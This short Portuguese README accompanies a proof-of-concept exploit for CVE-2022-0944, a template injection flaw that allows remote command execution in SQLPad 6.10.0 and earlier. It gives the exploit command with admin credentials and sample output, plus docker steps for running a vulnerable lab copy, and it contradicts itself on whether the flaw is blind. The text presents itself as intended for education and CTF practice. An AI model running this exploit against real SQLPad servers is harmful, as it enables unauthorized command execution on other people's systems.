
SQLPad - Injeção de template (exploração POC para RCE do SQLPad [CVE-2022-0944])
SQLPad - Injeção de template
Esta é uma vulnerabilidade cega, o que significa que a saída é retornada diretamente na resposta.
Use o script com o seguinte comando:
python3 exploit.py --url http://localhost:13000 --command 'ls -la > /tmp/test' --username admin --password password
[*] Login foi bem-sucedido
[*] Explorado!
Usando docker:
sudo docker run -p 13000:3000 -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=password --name vulnerable-sqlpad sqlpad/sqlpad:6.10.0sudo docker exec -it vulnerable-sqlpad /bin/bashPara acessar a interface web, use a URL http://localhost:13000 com as credenciais admin:password.
<= 6.10.0
Use apenas para fins educacionais ou desafios CTF.